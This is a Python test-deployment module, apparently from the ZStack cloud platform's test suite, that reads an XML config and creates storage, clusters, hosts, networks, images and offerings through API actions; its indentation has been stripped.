if pr.monUrls_.find(';') == -1:
action.monUrls = [pr.monUrls_]
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.fusionstorPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.fusionstorPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddFusionstorPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.FUSIONSTOR_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.nfsPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.nfsPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddNfsPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.NFS_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.url = "%s:%s" % (hostname_list[0], pr.url_.split(':')[1])
candidate_ip = get_nfs_ip_for_seperate_network(scenarioConfig, hostname_list[0], pr.name_)
if candidate_ip:
action.url = "%s:%s" % (candidate_ip, pr.url_.split(':')[1])
else:
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.simulatorPrimaryStorage'):
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for pr in xmlobject.safe_list(zone.primaryStorages.simulatorPrimaryStorage):
for zone_ref in range(duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
for pref in xmlobject.safe_list(cluster.primaryStorageRef):
if pref.text_ == pr.name_:
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
action = _generate_sim_ps_action(zone, pr, zone_ref, cluster_ref)
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.sharedMountPointPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.sharedMountPointPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddSharedMountPointPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone.name_ != zone_name:
continue
_deploy_primary_storage(zone)
wait_for_thread_done()
#Add Cluster
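# add_cluster creates each cluster, attaches the referenced primary storages and L2 networks,
# then attaches any L2 VXLAN network pools and creates the VXLAN networks defined on the zone.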
def add_cluster(scenarioConfig, scenarioFile, deployConfig, session_uuid, cluster_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _add_cluster(action, zone_ref, cluster, cluster_ref):
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
cinv = evt.inventory
try:
if xmlobject.has_element(cluster, 'primaryStorageRef'):
for pref in xmlobject.safe_list(cluster.primaryStorageRef):
ps_name = generate_dup_name(generate_dup_name(pref.text_, zone_ref, 'z'), cluster_ref, 'c')
pinvs = res_ops.get_resource(res_ops.PRIMARY_STORAGE, session_uuid, name=ps_name)
pinv = get_first_item_from_list(pinvs, 'Primary Storage', ps_name, 'Cluster')
action_ps = api_actions.AttachPrimaryStorageToClusterAction()
action_ps.sessionUuid = session_uuid
action_ps.clusterUuid = cinv.uuid
action_ps.primaryStorageUuid = pinv.uuid
evt = action_ps.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if cluster.allL2NetworkRef__ == 'true':
# find all L2 networks in the zone and attach them to the cluster
cond = res_ops.gen_query_conditions('zoneUuid', '=', \
action.zoneUuid)
l2_count = res_ops.query_resource_count(res_ops.L2_NETWORK, \
cond, session_uuid)
l2invs = res_ops.query_resource_fields(res_ops.L2_NETWORK, \
[{'name':'zoneUuid', 'op':'=', 'value':action.zoneUuid}], \
session_uuid, ['uuid'], 0, l2_count)
else:
l2invs = []
if xmlobject.has_element(cluster, 'l2NetworkRef'):
for l2ref in xmlobject.safe_list(cluster.l2NetworkRef):
l2_name = generate_dup_name(generate_dup_name(l2ref.text_, zone_ref, 'z'), cluster_ref, 'c')
cond = res_ops.gen_query_conditions('zoneUuid', '=', \
action.zoneUuid)
cond = res_ops.gen_query_conditions('name', '=', l2_name, \
cond)
l2inv = res_ops.query_resource_fields(res_ops.L2_NETWORK, \
cond, session_uuid, ['uuid'])
if not l2inv:
raise test_util.TestError("Can't find l2 network [%s] in database." % l2_name)
l2invs.extend(l2inv)
for l2inv in l2invs:
action = api_actions.AttachL2NetworkToClusterAction()
action.sessionUuid = session_uuid
action.clusterUuid = cinv.uuid
action.l2NetworkUuid = l2inv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
#def _add_l2VxlanNetwork(zone_uuid, zone_ref, cluster, cluster_ref, cluster_uuid):
def _add_l2VxlanNetwork(zone_uuid, cluster, cluster_uuid):
if xmlobject.has_element(cluster, 'l2VxlanNetworkPoolRef'):
for l2vxlanpoolref in xmlobject.safe_list(cluster.l2VxlanNetworkPoolRef):
l2_vxlan_pool_name = l2vxlanpoolref.text_
poolinvs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK_POOL, session_uuid, name=l2_vxlan_pool_name)
poolinv = get_first_item_from_list(poolinvs, 'L2 Vxlan Network Pool', l2_vxlan_pool_name, 'Cluster')
l2_vxlan_pool_name = l2vxlanpoolref.text_
action_vxlan = api_actions.AttachL2NetworkToClusterAction()
action_vxlan.l2NetworkUuid = poolinv.uuid
action_vxlan.clusterUuid = cluster_uuid
action_vxlan.systemTags = ["l2NetworkUuid::%s::clusterUuid::%s::cidr::{%s}" % (poolinv.uuid, cluster_uuid, l2vxlanpoolref.cidr_)]
action_vxlan.sessionUuid = session_uuid
evt = action_vxlan.run()
if xmlobject.has_element(zone.l2Networks, 'l2VxlanNetwork'):
for l2_vxlan in xmlobject.safe_list(zone.l2Networks.l2VxlanNetwork):
if xmlobject.has_element(l2_vxlan, 'l2VxlanNetworkPoolRef'):
l2_vxlan_invs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK, session_uuid, name=l2_vxlan.name_)
if len(l2_vxlan_invs) > 0:
continue
l2_vxlan_pool_name = l2vxlanpoolref.text_
poolinvs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK_POOL, session_uuid, name=l2_vxlan_pool_name)
poolinv = get_first_item_from_list(poolinvs, 'L2 Vxlan Network Pool', l2_vxlan_pool_name, 'Cluster')
test_util.test_logger("vxlan@@:%s" %(l2_vxlan.name_))
action_vxlan = api_actions.CreateL2VxlanNetworkAction()
action_vxlan.poolUuid = poolinv.uuid
action_vxlan.name = l2_vxlan.name_
action_vxlan.zoneUuid = zone_uuid
action_vxlan.sessionUuid = session_uuid
evt = action_vxlan.run()
#if clustVer.allL2NetworkRef__ == 'true':
# #find all L2 Vxlan network in zone and attach to cluster
# cond = res_ops.gen_query_conditions('zoneUuid', '=', \
# zone_uuid)
# l2_count = res_ops.query_resource_count(res_ops.L2_VXLAN_NETWORK, \
# cond, session_uuid)
# l2invs = res_ops.query_resource_fields(res_ops.L2_VXLAN_NETWORK, \
# [{'name':'zoneUuid', 'op':'=', 'value':zone_uuid}], \
# session_uuid, ['uuid'], 0, l2_count)
#else:
# l2invs = []
# if xmlobject.has_element(cluster, 'l2NetworkRef'):
# for l2ref in xmlobject.safe_list(cluster.l2NetworkRef):
# l2_name = generate_dup_name(generate_dup_name(l2ref.text_, zone_ref, 'z'), cluster_ref, 'c')
# cond = res_ops.gen_query_conditions('zoneUuid', '=', \
# zone_uuid)
# cond = res_ops.gen_query_conditions('name', '=', l2_name, \
# cond)
#
# l2inv = res_ops.query_resource_fields(res_ops.L2_VXLAN_NETWORK, \
# cond, session_uuid, ['uuid'])
# if not l2inv:
# raise test_util.TestError("Can't find l2 network [%s] in database." % l2_name)
# l2invs.extend(l2inv)
#for l2inv in l2invs:
# action = api_actions.AttachL2NetworkToClusterAction()
# action.sessionUuid = session_uuid
# action.clusterUuid = cluster_uuid
# action.l2NetworkUuid = l2inv.uuid
# thread = threading.Thread(target=_thread_for_action, args=(action,))
# wait_for_thread_queue()
# thread.start()
def _deploy_cluster(zone):
if not xmlobject.has_element(zone, "clusters.cluster"):
return
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'Cluster')
action = api_actions.CreateClusterAction()
action.sessionUuid = session_uuid
action.name = generate_dup_name(generate_dup_name(cluster.name_, zone_ref, 'z'), cluster_ref, 'c')
action.description = generate_dup_name(generate_dup_name(cluster.description__, zone_ref, 'z'), cluster_ref, 'c')
action.hypervisorType = cluster.hypervisorType_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_add_cluster, args=(action, zone_ref, cluster, cluster_ref, ))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
_deploy_cluster(zone)
wait_for_thread_done()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'Cluster')
cinvs = res_ops.get_resource(res_ops.CLUSTER, session_uuid, name=cluster.name_)
cinv = get_first_item_from_list(cinvs, 'Cluster', cluster.name_, '_add_l2VxlanNetwork')
_add_l2VxlanNetwork(zinv.uuid, cluster, cinv.uuid)
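# The helpers below map deploy-config node/host references to the IP addresses recorded in the
# generated scenario file.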
def get_node_from_scenario_file(nodeRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'nodeRef'):
if vm.nodeRef.text_ == nodeRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
return s_vm.ip_
return None
def get_nodes_from_scenario_file(scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
nodes_ip = ''
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'nodeRef'):
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
nodes_ip += ' %s' % s_vm.ip_
return nodes_ip
def get_host_from_scenario_file(hostRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'hostRef'):
if vm.hostRef.text_ == hostRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if s_vm.managementIp_ != s_vm.ip_:
return s_vm.managementIp_
else:
return s_vm.ip_
return None
def get_host_obj_from_scenario_file(hostRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'hostRef'):
if vm.hostRef.text_ == hostRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
return s_vm
return None
#Add Host
def add_host(scenarioConfig, scenarioFile, deployConfig, session_uuid, host_ip = None, zone_name = None, \
cluster_name = None):
'''
Add hosts based on an XML deploy config object.
If zone_name, cluster_name or host_ip is provided, this function will
only add the related hosts.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_host(cluster, zone_ref, cluster_ref):
if not xmlobject.has_element(cluster, "hosts.host"):
return
if zone_ref == 0 and cluster_ref == 0:
cluster_name = cluster.name_
else:
cluster_name = generate_dup_name(generate_dup_name(cluster.name_, zone_ref, 'z'), cluster_ref, 'c')
cinvs = res_ops.get_resource(res_ops.CLUSTER, session_uuid, name=cluster_name)
cinv = get_first_item_from_list(cinvs, 'Cluster', cluster_name, 'L3 network')
for host in xmlobject.safe_list(cluster.hosts.host):
if host_ip and host_ip != host.managementIp_:
continue
if host.duplication__ == None:
host_duplication = 1
else:
host_duplication = int(host.duplication__)
for i in range(host_duplication):
if cluster.hypervisorType_ == inventory.KVM_HYPERVISOR_TYPE:
action = api_actions.AddKVMHostAction()
action.username = host.username_
action.password = host.password_
if hasattr(host, 'port_'):
action.port = host.port_
action.sshport = host.port_
action.sshPort = host.port_
action.timeout = AddKVMHostTimeOut
elif cluster.hypervisorType_ == inventory.SIMULATOR_HYPERVISOR_TYPE:
action = api_actions.AddSimulatorHostAction()
action.cpuCapacity = host.cpuCapacity_
action.memoryCapacity = sizeunit.get_size(host.memoryCapacity_)
action.sessionUuid = session_uuid
action.clusterUuid = cinv.uuid
action.hostTags = host.hostTags__
if zone_ref == 0 and cluster_ref == 0 and i == 0:
action.name = host.name_
action.description = host.description__
managementIp = get_host_from_scenario_file(host.name_, scenarioConfig, scenarioFile, deployConfig)
if managementIp != None:
action.managementIp = managementIp
else:
action.managementIp = host.managementIp_
else:
action.name = generate_dup_name(generate_dup_name(generate_dup_name(host.name_, zone_ref, 'z'), cluster_ref, 'c'), i, 'h')
action.description = generate_dup_name(generate_dup_name(generate_dup_name(host.description__, zone_ref, 'z'), cluster_ref, 'c'), i, 'h')
action.managementIp = generate_dup_host_ip(host.managementIp_, zone_ref, cluster_ref, i)
thread = threading.Thread(target=_thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if not xmlobject.has_element(zone, 'clusters.cluster'):
continue
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
_deploy_host(cluster, zone_ref, cluster_ref)
wait_for_thread_done()
test_util.test_logger('All add KVM host actions are done.')
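# A minimal usage sketch for add_host(); scenario_config, scenario_file,
# deploy_config and 'zone1' are placeholder values, obtained or chosen the
# same way deploy_initial_database() below obtains them:
#   session_uuid = account_operations.login_as_admin()
#   add_host(scenario_config, scenario_file, deploy_config, session_uuid, zone_name='zone1')
#   account_operations.logout(session_uuid)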
#Add L3 network
def add_l3_network(scenarioConfig, scenarioFile, deployConfig, session_uuid, l3_name = None, l2_name = None, \
zone_name = None):
'''
add_l3_network will add L3 networks, together with their related DNS,
IpRange and network service settings.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_l3_network(l2, zone_ref, cluster_ref):
if not xmlobject.has_element(l2, "l3Networks.l3BasicNetwork"):
return
if not l2.duplication__:
l2_dup = 1
else:
l2_dup = int(l2.duplication__)
for l2_num in range(l2_dup):
for l3 in xmlobject.safe_list(l2.l3Networks.l3BasicNetwork):
if l3_name and l3_name != l3.name_:
continue
l2Name = generate_dup_name(generate_dup_name(generate_dup_name(l2.name_, zone_ref, 'z'), cluster_ref, 'c'), l2_num, 'n')
l3Name = generate_dup_name(generate_dup_name(generate_dup_name(l3.name_, zone_ref, 'z'), cluster_ref, 'c'), l2_num, 'n')
l2invs = res_ops.get_resource(res_ops.L2_NETWORK, \
session_uuid, \
name=l2Name)
l2inv = get_first_item_from_list(l2invs, \
'L2 Network', l2Name, 'L3 Network')
thread = threading.Thread(target=_do_l3_deploy, \
args=(l3, l2inv.uuid, l3Name, session_uuid, ))
wait_for_thread_queue()
thread.start()
def _do_l3_deploy(l3, l2inv_uuid, l3Name, session_uuid):
action = api_actions.CreateL3NetworkAction()
action.sessionUuid = session_uuid
action.description = l3.description__
if l3.system__ and l3.system__ != 'False':
action.system = 'true'
action.l2NetworkUuid = l2inv_uuid
action.name = l3Name
action.type = inventory.L3_BASIC_NETWORK_TYPE
if l3.domain_name__:
action.dnsDomain = l3.domain_name__
try:
evt = action.run()
except:
exc_info.append(sys.exc_info())
test_util.test_logger(jsonobject.dumps(evt))
l3_inv = evt.inventory
#add dns
if xmlobject.has_element(l3, 'dns'):
for dns in xmlobject.safe_list(l3.dns):
action = api_actions.AddDnsToL3NetworkAction()
action.sessionUuid = session_uuid
action.dns = dns.text_
action.l3NetworkUuid = l3_inv.uuid
try:
evt = action.run()
except:
exc_info.append(sys.exc_info())
test_util.test_logger(jsonobject.dumps(evt))
#add ip range.
if xmlobject.has_element(l3, 'ipRange'):
do_add_ip_range(l3.ipRange, l3_inv.uuid, session_uuid)
#add network service.
providers = {}
action = api_actions.QueryNetworkServiceProviderAction()
action.sessionUuid = session_uuid
action.conditions = []
try:
reply = action.run()
except:
exc_info.append(sys.exc_info())
for pinv in reply:
providers[pinv.name] = pinv.uuid
if xmlobject.has_element(l3, 'networkService'):
do_add_network_service(l3.networkService, l3_inv.uuid, \
providers, session_uuid)
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VxlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VxlanNetwork))
for l2 in l2networks:
if l2_name and l2_name != l2.name_:
continue
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
if duplication == 1:
_deploy_l3_network(l2, 0, 0)
else:
for zone_ref in range(duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
if zone_ref == 1 and cluster_ref == 1:
zone_ref = 0
cluster_ref = 0
_deploy_l3_network(l2, zone_ref, cluster_ref)
wait_for_thread_done()
test_util.test_logger('All add L3 Network actions are done.')
#Add Iprange
def add_ip_range(deployConfig, session_uuid, ip_range_name = None, \
zone_name= None, l3_name = None):
'''
Called when only adding an IP range. If the IP range is in the L3 config,
add_l3_network will add the ip range directly.
deployConfig is an xmlobject. If using the standard net_operation, please
check net_operations.add_ip_range(test_util.IpRangeOption())
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
l3networks = []
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
for l2 in l2networks:
if xmlobject.has_element(l2, 'l3Networks.l3BasicNetwork'):
l3networks.extend(xmlobject.safe_list(l2.l3Networks.l3BasicNetwork))
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for zone_duplication in range(duplication):
for l3 in l3networks:
if l3_name and l3_name != l3.name_:
continue
if not xmlobject.has_element(l3, 'ipRange'):
continue
if zone_duplication == 0:
l3Name = l3.name_
else:
l3Name = generate_dup_name(l3.name_, zone_duplication, 'z')
l3_invs = res_ops.get_resource(res_ops.L3_NETWORK, session_uuid, name = l3Name)
l3_inv = get_first_item_from_list(l3_invs, 'L3 Network', l3Name, 'IP range')
do_add_ip_range(l3.ipRange, l3_inv.uuid, session_uuid, \
ip_range_name)
def do_add_ip_range(ip_range_xml_obj, l3_uuid, session_uuid, \
ip_range_name = None):
for ir in xmlobject.safe_list(ip_range_xml_obj):
if ip_range_name and ip_range_name != ir.name_:
continue
action = api_actions.AddIpRangeAction()
action.sessionUuid = session_uuid
action.description = ir.description__
action.endIp = ir.endIp_
action.gateway = ir.gateway_
action.l3NetworkUuid = l3_uuid
action.name = ir.name_
action.netmask = ir.netmask_
action.startIp = ir.startIp_
try:
evt = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
test_util.test_logger(jsonobject.dumps(evt))
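# For reference, do_add_ip_range() reads the attributes name, description,
# startIp, endIp, gateway and netmask from each ipRange element, so a config
# entry is expected to look roughly like this (values are illustrative only):
#   <ipRange name="ir-1" description="test range"
#            startIp="10.0.1.100" endIp="10.0.1.200"
#            gateway="10.0.1.1" netmask="255.255.255.0"/>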
#Add Network Service
def add_network_service(deployConfig, session_uuid):
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
l3networks = []
for zone in xmlobject.safe_list(deployConfig.zones.zone):
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
for l2 in l2networks:
if xmlobject.has_element(l2, 'l3Networks.l3BasicNetwork'):
l3networks.extend(xmlobject.safe_list(l2.l3Networks.l3BasicNetwork))
providers = {}
action = api_actions.QueryNetworkServiceProviderAction()
action.sessionUuid = session_uuid
action.conditions = []
try:
reply = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
for pinv in reply:
providers[pinv.name] = pinv.uuid
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for zone_duplication in range(duplication):
for l3 in l3networks:
if not xmlobject.has_element(l3, 'networkService'):
continue
if zone_duplication == 0:
l3_name = l3.name_
else:
l3_name = generate_dup_name(l3.name_, zone_duplication, 'z')
l3_invs = res_ops.get_resource(res_ops.L3_NETWORK, session_uuid, name = l3_name)
l3_inv = get_first_item_from_list(l3_invs, 'L3 Network', l3_name, 'Network Service')
do_add_network_service(l3.networkService, l3_inv.uuid, \
providers, session_uuid)
def do_add_network_service(net_service_xml_obj, l3_uuid, providers, \
session_uuid):
allservices = {}
for ns in xmlobject.safe_list(net_service_xml_obj):
puuid = providers.get(ns.provider_)
if not puuid:
raise test_util.TestError('cannot find network service provider[%s], it may not have been added' % ns.provider_)
servs = []
for nst in xmlobject.safe_list(ns.serviceType):
servs.append(nst.text_)
allservices[puuid] = servs
action = api_actions.AttachNetworkServiceToL3NetworkAction()
action.sessionUuid = session_uuid
action.l3NetworkUuid = l3_uuid
action.networkServices = allservices
try:
evt = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
test_util.test_logger(jsonobject.dumps(evt))
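# Sketch of the mapping built above: allservices maps each provider uuid to
# the list of serviceType strings declared under that provider, e.g. (uuids
# and service names are illustrative only):
#   {'<flat-provider-uuid>': ['DHCP', 'Userdata'],
#    '<vrouter-provider-uuid>': ['DNS', 'SNAT', 'PortForwarding']}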
#Add Image
def add_image(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_image(action):
increase_image_thread()
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
finally:
decrease_image_thread()
if not xmlobject.has_element(deployConfig, 'images.image'):
return
for i in xmlobject.safe_list(deployConfig.images.image):
for bsref in xmlobject.safe_list(i.backupStorageRef):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid, name=bsref.text_)
bs = get_first_item_from_list(bss, 'backup storage', bsref.text_, 'image')
action = api_actions.AddImageAction()
action.sessionUuid = session_uuid
#TODO: account uuid will be removed later.
action.accountUuid = inventory.INITIAL_SYSTEM_ADMIN_UUID
action.backupStorageUuids = [bs.uuid]
action.bits = i.bits__
if not action.bits:
action.bits = 64
action.description = i.description__
action.format = i.format_
action.mediaType = i.mediaType_
action.guestOsType = i.guestOsType__
if not action.guestOsType:
action.guestOsType = 'unknown'
action.platform = i.platform__
if not action.platform:
action.platform = 'Linux'
action.hypervisorType = i.hypervisorType__
action.name = i.name_
action.url = i.url_
action.timeout = 1800000
if i.hasattr('system_'):
action.system = i.system_
if i.hasattr('systemTags_'):
action.systemTags = i.systemTags_.split(',')
thread = threading.Thread(target = _add_image, args = (action, ))
print 'before add image1: %s' % i.url_
wait_for_image_thread_queue()
print 'before add image2: %s' % i.url_
thread.start()
print 'add image: %s' % i.url_
print 'all images add command are executed'
wait_for_thread_done(True)
print 'all images have been added'
#Add Disk Offering
def add_disk_offering(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_disk_offering(disk_offering_xml_obj, session_uuid):
action = api_actions.CreateDiskOfferingAction()
action.sessionUuid = session_uuid
action.name = disk_offering_xml_obj.name_
action.description = disk_offering_xml_obj.description_
action.diskSize = sizeunit.get_size(disk_offering_xml_obj.diskSize_)
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'diskOfferings.diskOffering'):
return
for disk_offering_xml_obj in \
xmlobject.safe_list(deployConfig.diskOfferings.diskOffering):
thread = threading.Thread(target = _add_disk_offering, \
args = (disk_offering_xml_obj, session_uuid))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add Instance Offering
def add_instance_offering(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_io(instance_offering_xml_obj, session_uuid):
action = api_actions.CreateInstanceOfferingAction()
action.sessionUuid = session_uuid
action.name = instance_offering_xml_obj.name_
action.description = instance_offering_xml_obj.description__
action.cpuNum = instance_offering_xml_obj.cpuNum_
#action.cpuSpeed = instance_offering_xml_obj.cpuSpeed_
if instance_offering_xml_obj.memorySize__:
action.memorySize = sizeunit.get_size(instance_offering_xml_obj.memorySize_)
elif instance_offering_xml_obj.memoryCapacity_:
action.memorySize = sizeunit.get_size(instance_offering_xml_obj.memoryCapacity_)
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, \
'instanceOfferings.instanceOffering'):
return
for instance_offering_xml_obj in \
xmlobject.safe_list(deployConfig.instanceOfferings.instanceOffering):
thread = threading.Thread(target = _add_io, \
args = (instance_offering_xml_obj, session_uuid, ))
wait_for_thread_queue()
thread.start()
